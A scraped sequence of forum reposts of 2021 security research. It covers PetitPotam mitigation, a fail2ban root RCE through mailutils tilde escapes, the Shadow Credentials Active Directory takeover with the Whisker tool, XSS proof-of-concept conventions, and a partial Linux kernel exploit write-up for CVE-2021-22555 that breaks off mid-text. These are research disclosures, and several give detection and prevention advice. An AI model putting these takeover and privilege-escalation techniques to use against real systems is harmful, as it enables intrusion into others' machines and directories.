Attacks." To safeguard against this line of attack, the Windows maker is recommending that customers disable NTLM authentication on the domain controller. In the event NTLM cannot be turned off for compatibility reasons, the company is urging users to take one of the two steps below - Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. Disable NTLM for Internet Information Services (IIS) on AD CS Servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services PetitPotam marks the third major Windows security issue disclosed over the past month after the PrintNightmare and SeriousSAM (aka HiveNightmare) vulnerabilities. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa: https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html
  7. fail2ban – Remote Code Execution JAKUB ŻOCZEK | July 26, 2021 | Research This article is about the recently published security advisory for a pretty popular software – fail2ban (CVE-2021-32749). The vulnerability, which could be massively exploited and lead to root-level code execution on multiple boxes, however this task is rather hard to achieve by regular person. It all has its roots in mailutils package and I’ve found it by a total accident when playing with mail command. The fail2ban analyses logs (or other data sources) in search of brute force traces in order to block such attempts based on the IP address. There are plenty of rules for different services (SSH, SMTP, HTTP, etc.). There are also defined actions which could be performed after blocking a client. One of these actions is sending an e-mail. If you search the Internet to find out how to send an e-mail from a command line, you will often get such solution: 1 $ echo "test e-mail" | mail -s "subject" user@example.org That is the exact way how one of fail2ban actions is configured to send e-mails about client getting blocked (./config/action.d/mail-whois.conf😞 1 2 3 4 5 6 7 8 actionban = printf %%b "Hi,\n The IP <ip> has just been banned by Fail2Ban after <failures> attempts against <name>.\n\n Here is more information about <ip> :\n `%(_whois_command)s`\n Regards,\n Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest> There is nothing suspicious about the above, until knowing about one specific thing that can be found inside the mailutils manual. It is the tilde escape sequences: The ‘~!’ escape executes specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The ‘~|’ escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced. If the command produced no output, mail assumes that something went wrong and retains the old contents of your message. This is the way it works in real life: 1 2 3 4 5 6 7 8 9 jz@fail2ban:~$ cat -n pwn.txt 1 Next line will execute command 2 ~! uname -a 3 4 Best, 5 JZ jz@fail2ban:~$ cat pwn.txt | mail -s "whatever" whatever@whatever.com Linux fail2ban 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux jz@fail2ban:~$ If you get back to the previously mentioned fail2ban e-mail action you can notice there is a whois output attached to the e-mail body. So if we could add some tilde escape sequence to whois output of our IP address – well, it should end up with code execution. As root. What are our options? As attackers we need to control the whois output – how to achieve that? Well, the first thing which came into my mind was to kindly ask my ISP to contact RIPE and make a pretty custom entry for my particular IP address. Unfortunately – it doesn’t work like that. RIPE/ARIN/APNIC and others put entries for whole IP classes as minimum, not for particular one IP address. Also, I’m more than sure that achieving it is extremely hard in a formal way, plus the fact that putting malicious payload as a whois entry would make people ask questions. Is there a way to start my own whois server? Surprisingly – there is, and you can find a couple of them running over the Internet. By digging whois related RFC you can find information about an attribute called ReferralServer. If your whois client will find such an attribute in the response, it will query the server that was set in the value to get more information about the IP address or domain. Just take a look what happens when getting whois for 157.5.7.5 IP address: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 $ whois 157.5.7.5 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/resources/registry/whois/tou/ # # If you see inaccuracies in the results, please report at # https://www.arin.net/resources/registry/whois/inaccuracy_reporting/ # # Copyright 1997-2021, American Registry for Internet Numbers, Ltd. # NetRange: 157.1.0.0 - 157.14.255.255 CIDR: 157.4.0.0/14, 157.14.0.0/16, 157.1.0.0/16, 157.12.0.0/15, 157.2.0.0/15, 157.8.0.0/14 NetName: APNIC-ERX-157-1-0-0 NetHandle: NET-157-1-0-0-1 Parent: NET157 (NET-157-0-0-0-0) NetType: Early Registrations, Transferred to APNIC OriginAS: Organization: Asia Pacific Network Information Centre (APNIC) [… cut …] ReferralServer: whois://whois.apnic.net ResourceLink: http://wq.apnic.net/whois-search/static/search.html OrgTechHandle: AWC12-ARIN OrgTechName: APNIC Whois Contact OrgTechPhone: +61 7 3858 3188 OrgTechEmail: search-apnic-not-arin@apnic.net [… cut …] Found a referral to whois.apnic.net. % [whois.apnic.net] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html % Information related to '157.0.0.0 - 157.255.255.255' % Abuse contact for '157.0.0.0 - 157.255.255.255' is 'helpdesk@apnic.net' inetnum: 157.0.0.0 - 157.255.255.255 netname: ERX-NETBLOCK descr: Early registration addresses [… cut …] In theory and while having a pretty big network you could probably ask your Regional Internet Registries to use RWhois for your network. On the other hand – simply imagine black hats breaking into a server running rwhois, putting a malicious entry there and then starting the attack. To be fair this scenario seems to be way easier than becoming a big company to legally have its own whois server. In case you’re a government and you can simply control network traffic – the task is way easier. By taking a closer look at the whois protocol, we can notice few things: it was designed really long time ago, it’s pretty simple (you ask for IP or domain name and get the raw output), it’s unencrypted on the network level. By simply performing a MITM attack on an unencrypted protocol (which whois is) attackers could just put the tilde escape sequence and start an attack over multiple hosts. It’s worth remembering that the root problem here is mailutils which has this flaw by design. I believe a lot of people are unaware about such a feature, and there’s still plenty of software that could use the mail command this way. As could be noticed many times in history – security is hard and complex. Sometimes totally innocent functionality which you wouldn’t ever suspect for being a threat could be a cause of dangerous vulnerability. Author: Jakub Żoczek Sursa: https://research.securitum.com/fail2ban-remote-code-execution/
  8. Key-Checker Go scripts for checking API key / access token validity Update V1.0.0 🚀 Added 37 checkers! Screenshoot 📷 How to Install go get github.com/daffainfo/Key-Checker Reference 📚 https://github.com/streaak/keyhacks Sursa: https://github.com/daffainfo/Key-Checker
  9. Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover Elad Shamir The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we compromise an account that has delegated rights over a user account, we can simply reset their password, or, if we want to be less disruptive, we can set an SPN or disable Kerberos pre-authentication and try to roast the account. For computer accounts, it is a bit more complicated, but RBCD can get the job done. These techniques have their shortcomings: Resetting a user’s password is disruptive, may be reported, and may not be permitted per the Rules of Engagement (ROE). Roasting is time-consuming and depends on the target having a weak password, which may not be the case. RBCD is hard to follow because someone (me) failed to write a clear and concise post about it. RBCD requires control over an account with an SPN, and creating a new computer account to meet that requirement may lead to detection and cannot be cleaned up until privilege escalation is achieved. The recent work that Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_) published about AD CS made me think about other technologies that use Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos, and Windows Hello for Business was the obvious candidate, which led me to (re)discover an alternative technique for user and computer object takeover. Tl;dr It is possible to add “Key Credentials” to the attribute msDS-KeyCredentialLink of the target user/computer object and then perform Kerberos authentication as that account using PKINIT. In plain English: this is a much easier and more reliable takeover primitive against Users and Computers. A tool to operationalize this technique has been released alongside this post. Previous Work When I looked into Key Trust, I found that Michael Grafnetter (@MGrafnetter) had already discovered this abuse technique and presented it at Black Hat Europe 2019. His discovery of this user and computer object takeover technique somewhat flew under the radar, I believe because this technique was only the primer to the main topic of his talk. Michael clearly demonstrated this abuse in his talk and noted that it affected both users and computers. In his presentation, Michael explained some of the inner workings of WHfB and the Key Trust model, and I highly recommend watching it. Michael has also been maintaining a library called DSInternals that facilitates the abuse of this mechanism, and a lot more. I recently ported some of Michael’s code to a new C# tool called Whisker to be used via implants on operations. More on that below. What is PKINIT? In Kerberos authentication, clients must perform “pre-authentication” before the KDC (the Domain Controller in an Active Directory environment) provides them with a Ticket Granting Ticket (TGT), which can subsequently be used to obtain Service Tickets. The reason for pre-authentication is that without it, anyone could obtain a blob encrypted with a key derived from the client’s password and try to crack it offline, as done in the AS-REP Roasting Attack. The client performs pre-authentication by encrypting a timestamp with their credentials to prove to the KDC that they have the credentials for the account. Using a timestamp rather than a static value helps prevent replay attacks. The symmetric key (secret key) approach, which is the one most widely used and known, uses a symmetric key derived from the client’s password, AKA secret key. If using RC4 encryption, this key would be the NT hash of the client’s password. The KDC has a copy of the client’s secret key and can decrypt the pre-authentication data to authenticate the client. The KDC uses the same key to encrypt a session key sent to the client along with the TGT. PKINIT is the less common, asymmetric key (public key) approach. The client has a public-private key pair, and encrypts the pre-authentication data with their private key, and the KDC decrypts it with the client’s public key. The KDC also has a public-private key pair, allowing for the exchange of a session key using one of two methods: Diffie-Hellman Key Delivery The Diffie-Hellman Key Delivery allows the KDC and the client to securely establish a shared session key that cannot be intercepted by attackers performing passive man-in-the-middle attacks, even if the attacker has the client’s or the KDC’s private key, (almost) providing Perfect Forward Secrecy. I say _almost _because the session key is also stored inside the encrypted part of the TGT, which is encrypted with the secret key of the KRBTGT account. Public Key Encryption Key Delivery Public Key Encryption Key Delivery uses the KDC’s private key and the client’s public key to envelop a session key generated by the KDC. Traditionally, Public Key Infrastructure (PKI) allows the KDC and the client to exchange their public keys using Digital Certificates signed by an entity that both parties have previously established trust with — the Certificate Authority (CA). This is the Certificate Trust model, which is most commonly used for smartcard authentication. PKINIT is not possible out of the box in every Active Directory environment. The key (pun intended) is that both the KDC and the client need a public-private key pair. However, if the environment has AD CS and a CA available, the Domain Controller will automatically obtain a certificate by default. No PKI? No Problem! Microsoft also introduced the concept of Key Trust, to support passwordless authentication in environments that don’t support Certificate Trust. Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate. The client’s public key is stored in a multi-value attribute called msDS-KeyCredentialLink, introduced in Windows Server 2016. The values of this attribute are Key Credentials, which are serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account have several linked devices. This trust model eliminates the need to issue client certificates for everyone using passwordless authentication. However, the Domain Controller still needs a certificate for the session key exchange. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can obtain a TGT for that user. Windows Hello for Business Provisioning and Authentication Windows Hello for Business (WHfB) supports multi-factor passwordless authentication. When the user enrolls, the TPM generates a public-private key pair for the user’s account — the private key should never leave the TPM. Next, if the Certificate Trust model is implemented in the organization, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. However, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account. The private key is protected by a PIN code, which Windows Hello allows replacing with a biometric authentication factor, such as fingerprint or face recognition. When a client logs in, Windows attempts to perform PKINIT authentication using their private key. Under the Key Trust model, the Domain Controller can decrypt their pre-authentication data using the raw public key in the corresponding NGC object stored in the client’s msDS-KeyCredentialLink attribute. Under the Certificate Trust model, the Domain Controller will validate the trust chain of the client’s certificate and then use the public key inside it. Once pre-authentication is successful, the Domain Controller can exchange a session key via Diffie-Hellman Key Delivery or Public Key Encryption Key Delivery. Note that I intentionally used the term “client” rather than “user” here because this mechanism applies to both users and computers. What About NTLM? PKINIT allows WHfB users, or, more traditionally, smartcard users, to perform Kerberos authentication and obtain a TGT. But what if they need to access resources that require NTLM authentication? To address that, the client can obtain a special Service Ticket that contains their NTLM hash inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity. The PAC is stored inside the encrypted part of the ticket, and the ticket is encrypted using the key of the service it is issued for. In the case of a TGT, the ticket is encrypted using the key of the KRBTGT account, which the user should not be able to decrypt. To obtain a ticket that the user can decrypt, the user must perform Kerberos User to User (U2U) authentication to itself. When I first read the title of the RFC for this mechanism, I thought to myself, “Does that mean we can abuse this mechanism to Kerberoast any user account? That must be too good to be true”. And it was — the risk of Kerberoasting was taken into consideration, and U2U Service Tickets are encrypted using the target user’s session key rather than their secret key. That presented another challenge for the U2U design — every time a client authenticates and obtains a TGT, a new session key is generated. Also, KDC does not maintain a repository of active session keys — it extracts the session key from the client’s ticket. So, what session key should the KDC use when responding to a U2U TGS-REQ? The solution was sending a TGS-REQ containing the target user’s TGT as an “additional ticket”. The KDC will extract the session key from the TGT’s encrypted part (hence not really perfect forward secrecy) and generate a new service ticket. So, if a user requests a U2U Service Ticket from itself to itself, they will be able to decrypt it and access the PAC and the NTLM hash. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user. As per MS-PAC, the NTLM_SUPPLEMENTAL_CREDENTIAL entity is added to the PAC only if PKINIT authentication was performed. Back in 2017, Benjamin Delpy (@gentilkiwi) introduced code to Kekeo to support retrieving the NTLM hash of an account using this technique, and it will be added to Rubeus in an upcoming release. Abuse When abusing Key Trust, we are effectively adding alternative credentials to the account, or “Shadow Credentials”, allowing for obtaining a TGT and subsequently the NTLM hash for the user/computer. Those Shadow Credentials would persist even if the user/computer changed their password. Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options: Forge an RC4 silver ticket to impersonate privileged users to the corresponding host. Use the TGT to call S4U2Self to impersonate privileged users to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name. Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised — it is restricted to the private key generated by the attacker. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved. Whisker Alongside this post I am releasing a tool called “ Whisker “. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol. Whisker has four functions: Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object. Remove — This function removes a key credential from the target object specified by a DeviceID GUID. Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break. Requirements This technique requires the following: At least one Windows Server 2016 Domain Controller. A digital certificate for Server Authentication installed on the Domain Controller. Windows Server 2016 Functional Level in Active Directory. Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object. Detection There are two main opportunities for detection of this technique: If PKINIT authentication is not common in the environment or not common for the target account, the “Kerberos authentication ticket (TGT) was requested” event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank, as shown below: If a SACL is configured to audit Active Directory object modifications for the targeted account, the “Directory service object was modified” event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users. Prevention It is generally a good practice to proactively audit all inbound object control for highly privileged accounts. Just as users with lower privileges than Domain Admins shouldn’t be able to reset the passwords of members of the Domain Admins group, less secure, or less “trustworthy”, users with lower privileges should not be able to modify the msDS-KeyCredentialLink attribute of privileged accounts. A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts. However, an attacker with WriteOwner or WriteDACL privileges will be able to override this control, which can be detected with a suitable SACL. Conclusion Abusing Key Trust Account Mapping is a simpler way to take over user and computer accounts in Active Directory environments that support PKINIT for Kerberos authentication and have a Windows Server 2016 Domain Controller with the same functional level. References Whisker by (@elad_shamir) Exploiting Windows Hello for Business (Black Hat Europe 2019) by Michael Grafnetter (@MGrafnetter) DSInternals by Michael Grafnetter (@MGrafnetter) Sursa: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
  10. Eviatar Gerzi, Security Researcher, CyberArk Attackers are increasingly targeting Kubernetes clusters to compromise applications or abuse resources for things like crypto-coin mining. Through live demos, this research-based session will show attendees how. Eviatar Gerzi, who researches DevOps security, will also introduce an open source tool designed to help blue and red teams discover and eliminate risky permissions.Pre-Requisites: Basic experience with Kubernetes and familiarity with docker containers.
  11. Dr. Ruby, cred ca se pricepe la alte lucruri mai bine decat la medicina. Aici e profilul de Linkedin, NU e doctor: https://www.linkedin.com/in/dr-jane-ruby-49971411/ Bine, de fapt este doctor, doctor in psihologie. Mentioneaza un doctor in video, doctor HOMEOPAT (au uitat sa zica asta). Iar acel Gigel scoate articole de genul acesta in fiecare zi. Uitati-va macar la comentariile de pe Facebook, unele sunt pertitente. Bun venit pe Internet unde oricine zice ceva e adevarat.
  12. alert() is dead, long live print() James Kettle Director of Research @albinowax Published: 02 July 2021 at 13:27 UTC Updated: 05 July 2021 at 10:03 UTC Cross-Site Scripting and the alert() function have gone hand in hand for decades. Want to prove you can execute arbitrary JavaScript? Pop an alert. Want to find an XSS vulnerability the lazy way? Inject alert()-invoking payloads everywhere and see if anything pops up. However, there's trouble brewing on the horizon. Malicious adverts have been abusing our beloved alert to distract and social engineer visitors from inside their iframe. Google Chrome has decided to tackle this by disabling alert for cross-domain iframes. Cross-domain iframes are often built into websites deliberately, and are also a near-essential component of certain relatively advanced XSS attacks. Once Chrome 92 lands on 20th July 2021, XSS vulnerabilities inside cross-domain iframes will: No longer enable alert-based PoCs. Be invisible to anyone using alert-based detection techniques. What next? The obvious workaround is to use prompt or confirm, but unfortunately Chrome's mitigation blocks all dialogs. Triggering a DNS pingback to a listener, OAST-style is another potential approach, but less suitable as a PoC due to the config requirements. We also ruled out console.log() as console functions are often proxied or disabled by JavaScript obfuscators. It's quite funny that this "protection" against showing dialogs cross domain blocks alerts and prompts but as Yosuke Hasegawa pointed out they forgot about basic authentication. This works in the current version of canary. It's likely to be blocked in future though. We needed an alert-alternative that was: Simple, setup-free and easy to remember Highly visible, even when executed in an invisible iframe After weeks of intensive research, we're thrilled to bring you... print() We will be updating our Web Security Academy labs to support print() based solutions shortly. The XSS cheat sheet will also be updated to reflect the new print() payloads when using cross domain iframes. We'll keep using alert when there's no iframes involved... for now. Long live print! - Gareth & James Sursa: https://portswigger.net/research/alert-is-dead-long-live-print
  13. CVE-2021-22555: Turning \x00\x00 into 10000$ Andy Nguyen (theflow@) - Information Security Engineer CVE-2021-22555 is a 15 years old heap out-of-bounds write vulnerability in Linux Netfilter that is powerful enough to bypass all modern security mitigations and achieve kernel code execution. It was used to break the kubernetes pod isolation of the kCTF cluster and won 10000$ for charity (where Google will match and double the donation to 20000$). Table of Contents Introduction Vulnerability Exploitation Exploring struct msg_msg Achieving use-after-free Bypassing SMAP Achieving a better use-after-free Finding a victim object Bypassing KASLR/SMEP Escalating privileges Kernel ROP chain Escaping the container and popping a root shell Proof-Of-Concept Timeline Thanks Introduction After BleedingTooth, which was the first time I looked into Linux, I wanted to find a privilege escalation vulnerability as well. I started by looking at old vulnerabilities like CVE-2016-3134 and CVE-2016-4997 which inspired me to grep for memcpy() and memset() in the Netfilter code. This led me to some buggy code. Vulnerability When IPT_SO_SET_REPLACE or IP6T_SO_SET_REPLACE is called in compatibility mode, which requires the CAP_NET_ADMIN capability that can however be obtained in a user+network namespace, structures need to be converted from user to kernel as well as 32bit to 64bit in order to be processed by the native functions. Naturally, this is destined to be error prone. Our vulnerability is in xt_compat_target_from_user() where memset() is called with an offset target->targetsize that is not accounted for during the allocation - leading to a few bytes written out-of-bounds: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr, unsigned int *size) { const struct xt_target *target = t->u.kernel.target; struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t; int pad, off = xt_compat_target_offset(target); u_int16_t tsize = ct->u.user.target_size; char name[sizeof(t->u.user.name)]; t = *dstptr; memcpy(t, ct, sizeof(*ct)); if (target->compat_from_user) target->compat_from_user(t->data, ct->data); else memcpy(t->data, ct->data, tsize - sizeof(*ct)); pad = XT_ALIGN(target->targetsize) - target->targetsize; if (pad > 0) memset(t->data + target->targetsize, 0, pad); tsize += off; t->u.user.target_size = tsize; strlcpy(name, target->name, sizeof(name)); module_put(target->me); strncpy(t->u.user.name, name, sizeof(t->u.user.name)); *size += off; *dstptr += tsize; } The targetsize is not controllable by the user, but one can choose different targets with different structure sizes by name (like TCPMSS, TTL or NFQUEUE). The bigger targetsize is, the more we can vary in the offset. Though, the target size must not be 8 bytes aligned in order to fulfill pad > 0. The biggest possible I found is NFLOG for which we can choose an offset up to 0x4C bytes out-of-bounds (one can influence the offset by adding padding between struct xt_entry_match and struct xt_entry_target😞 struct xt_nflog_info { /* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */ __u32 len; __u16 group; __u16 threshold; __u16 flags; __u16 pad; char prefix[64]; }; Note that the destination of the buffer is allocated with GFP_KERNEL_ACCOUNT and can also vary in the size: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c struct xt_table_info *xt_alloc_table_info(unsigned int size) { struct xt_table_info *info = NULL; size_t sz = sizeof(*info) + size; if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE) return NULL; info = kvmalloc(sz, GFP_KERNEL_ACCOUNT); if (!info) return NULL; memset(info, 0, sizeof(*info)); info->size = size; return info; } Though, the minimum size is > 0x100 which means that the smallest slab this object can be allocated in is kmalloc-512. In other words, we have to find victims which are allocated between kmalloc-512 and kmalloc-8192 to exploit. Exploitation Our primitive is limited to writing four bytes of zero up to 0x4C bytes out-of-bounds. With such a primitive, usual targets are: Reference counter Unfortunately, I could not find any suitable objects with a reference counter in the first 0x4C bytes. Free list pointer CVE-2016-6187: Exploiting Linux kernel heap off-by-one is a good example on how to exploit the free list pointer. However, this was already 5 years ago, and meanwhile, kernels have the CONFIG_SLAB_FREELIST_HARDENED option enabled which among other things protects free list pointers. Pointer in a struct This is the most promising approach, however four bytes of zero is too much to write. For example, a pointer 0xffff91a49cb7f000 could only be turned to 0xffff91a400000000 or 0x9cb7f000, where both of them would likely be invalid pointers. On the other hand, if we used the primitive to write at the very beginning of the adjacent block, we could write less bytes, e.g. 2 bytes, and for example turn a pointer from 0xffff91a49cb7f000 to 0xffff91a49cb70000. Playing around with some victim objects, I noticed that I could never reliably allocate them around struct xt_table_info on kernel 5.4. I realized that it had something to do with the GFP_KERNEL_ACCOUNT flag, as other objects allocated with GFP_KERNEL_ACCOUNT did not have this issue. Jann Horn confirmed that before 5.9, separate slabs were used to implement accounting. Therefore, every heap primitive we use in the exploit chain should also use GFP_KERNEL_ACCOUNT. The syscall msgsnd() is a well known primitive for heap spraying (which uses GFP_KERNEL_ACCOUNT) and has been utilized for multiple public exploits already. Though, its structure msg_msg has surprisingly never been abused. In this write-up, we will demonstrate how this data-structure can be abused to gain a use-after-free primitive which in turn can be used to leak addresses and fake other objects. Coincidentally, in parallel to my research in March 2021, Alexander Popov also explored the very same structure in Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel. Exploring struct msg_msg When sending data with msgsnd(), the payload is split into multiple segments: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c static struct msg_msg *alloc_msg(size_t len) { struct msg_msg *msg; struct msg_msgseg **pseg; size_t alen; alen = min(len, DATALEN_MSG); msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); if (msg == NULL) return NULL; msg->next = NULL; msg->security = NULL; len -= alen; pseg = &msg->next; while (len > 0) { struct msg_msgseg *seg; cond_resched(); alen = min(len, DATALEN_SEG); seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); if (seg == NULL) goto out_err; *pseg = seg; seg->next = NULL; pseg = &seg->next; len -= alen; } return msg; out_err: free_msg(msg); return NULL; } where the headers for struct msg_msg and struct msg_msgseg are: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/msg.h /* one msg_msg structure for each message */ struct msg_msg { struct list_head m_list; long m_type; size_t m_ts; /* message text size */ struct msg_msgseg *next; void *security; /* the actual message follows immediately */ }; // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.h struct list_head { struct list_head *next, *prev; }; // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c struct msg_msgseg { struct msg_msgseg *next; /* the next part of the message follows immediately */ }; The first member in struct msg_msg is the mlist.next pointer which is pointing to another message in the queue (which is different from next as this is a pointer to the next segment). This is a perfect candidate to corrupt as you will learn next. Achieving use-after-free First, we initialize a lot of message queues (in our case 4096) using msgget(). Then, we send one message of size 4096 (including the struct msg_msg header) for each of the message queues using msgsnd(), which we will call the primary message. Eventually, after a lot of messages, we have some that are consecutive: [Figure 1: A series of blocks of primary messages] Next, we send a secondary message of size 1024 for each of the message queues using msgsnd(): [Figure 2: A series of blocks of primary messages pointing to secondary messages] Finally, we create some holes (in our case every 1024th) in the primary messages, and trigger the vulnerable setsockopt(IPT_SO_SET_REPLACE) option, which, in the best scenario, will allocate the struct xt_table_info object in one of the holes: [Figure 3: A xt_table_info allocated in between the blocks which corrupts the next pointer] We choose to overwrite two bytes of the adjacent object with zeros. Assume we are adjacent to another primary message, these bytes we overwrite are part of the pointer to the secondary message. Since we allocate them with a size of 1024 bytes, we therefore have a 1 - (1024 / 65536) chance to redirect the pointer (the only case we fail is when the two least significant bytes of the pointer are already zero). Now, the best scenario we can hope for is that the manipulated pointer also points to a secondary message, since the consequence will be two different primary messages pointing to the same secondary message, and this can lead to a use-after-free: [Figure 4: Two primary messages pointing to the same secondary message due to the corrupted pointer] However, how do we know which two primary messages are pointing to the same secondary message? In order to answer this question, we tag every (primary and secondary) message with the index of the message queue which is in [0, 4096). Then, after triggering the corruption, we iterate through all message queues, peek at all messages using msgrcv() with MSG_COPY and see if they are the same. If the tag of the primary message is different from the secondary message, it means that it has been redirected. In which case the tag of the primary message represents the index of the fake message queue, i.e. the one containing the wrong secondary message, and the tag of the wrong secondary message represents the index of the real message queue. Knowing these two indices, achieving a use-after-free is now trivial - we namely fetch the secondary message from the real message queue using msgrcv() and as such free it: [Figure 5: Freed secondary message with a stale reference] Note that we still have a reference to the freed message in the fake message queue. Bypassing SMAP Using unix sockets (which can be easily set up with socketpair()), we now spray a lot of messages of size 1024 and imitate the struct msg_msg header. Ideally, we are able to reclaim the address of the previously freed message: [Figure 6: Fake struct msg_msg put in place of the freed secondary message] Note that mlist.next is 41414141 as we do not yet know any kernel addresses (when SMAP is enabled, we cannot specify a user address). Not having a kernel address is crucial as it actually prevents us from freeing the block again (you will learn later why that is desired). The reason is that during msgrcv(), the message is unlinked from the message queue that is a circular list. Luckily, we are actually in a good position to achieve an information leak, as there are some interesting fields in struct msg_msg. Namely, the field m_ts is used to determine how much data to return to userland: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst) { struct msg_msgseg *dst_pseg, *src_pseg; size_t len = src->m_ts; size_t alen; if (src->m_ts > dst->m_ts) return ERR_PTR(-EINVAL); alen = min(len, DATALEN_MSG); memcpy(dst + 1, src + 1, alen); ... return dst; } The original size of the message is only 1024-sizeof(struct msg_msg) bytes which we can now artificially increase to DATALEN_MSG=4096-sizeof(struct msg_msg). As a consequence, we will now be able to read past the intended message size and leak the struct msg_msg header of the adjacent message. As said before, the message queue is implemented as a circular list, thus, mlist.next points back to the primary message. Knowing the address of a primary message, we can re-craft the fake struct msg_msg with that address as next (meaning that it is the next segment). The content of the primary message can then be leaked by reading more than DATALEN_MSG bytes. The leaked mlist.next pointer from the primary message reveals the address of the secondary message that is adjacent to our fake struct msg_msg. Subtracting 1024 from that address, we finally have the address of the fake message. Achieving a better use-after-free Now, we can rebuild the fake struct msg_msg object with the leaked address as mlist.next and mlist.prev (meaning that it is pointing to itself), making the fake message free-able with the fake message queue. [Figure 7: Fake struct msg_msg with a valid next pointer pointing to itself] Note that when spraying using unix sockets, we actually have a struct sk_buff object which points to the fake message. Obviously, this means that when we free the fake message, we still have a stale reference: [Figure 8: Freed fake message with a stale reference] This stale struct sk_buff data buffer is a better use-after-free scenario to exploit, because it does not contain header information, meaning that we can now use it to free any kind of object on the slab. In comparison, freeing a struct msg_msg object is only possible if the first two members are writable pointers (needed to unlink the message). Finding a victim object The best victim to attack is one that has a function pointer in its structure. Remember that the victim must also be allocated with GFP_KERNEL_ACCOUNT. Talking to Jann Horn, he suggested the struct pipe_buffer object which is allocated in kmalloc-1024 (hence why the secondary message is 1024 bytes). The struct pipe_buffer can be easily allocated with pipe() that has alloc_pipe_info() as a subroutine: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c struct pipe_inode_info *alloc_pipe_info(void) { ... unsigned long pipe_bufs = PIPE_DEF_BUFFERS; ... pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT); if (pipe == NULL) goto out_free_uid; ... pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT); ... } While it does not contain a function pointer directly, it contains a pointer to struct pipe_buf_operations that on the other hand has function pointers: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; }; struct pipe_buf_operations { ... /* * When the contents of this pipe buffer has been completely * consumed by a reader, ->release() is called. */ void (*release)(struct pipe_inode_info *, struct pipe_buffer *); ... }; Bypassing KASLR/SMEP When one writes to the pipes, struct pipe_buffer is populated. Most importantly, ops will point to the static structure anon_pipe_buf_ops which resides in the .data segment: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c static const struct pipe_buf_operations anon_pipe_buf_ops = { .release = anon_pipe_buf_release, .try_steal = anon_pipe_buf_try_steal, .get = generic_pipe_buf_get, }; Since the difference between the .data segment and the .text segment is always the same, having 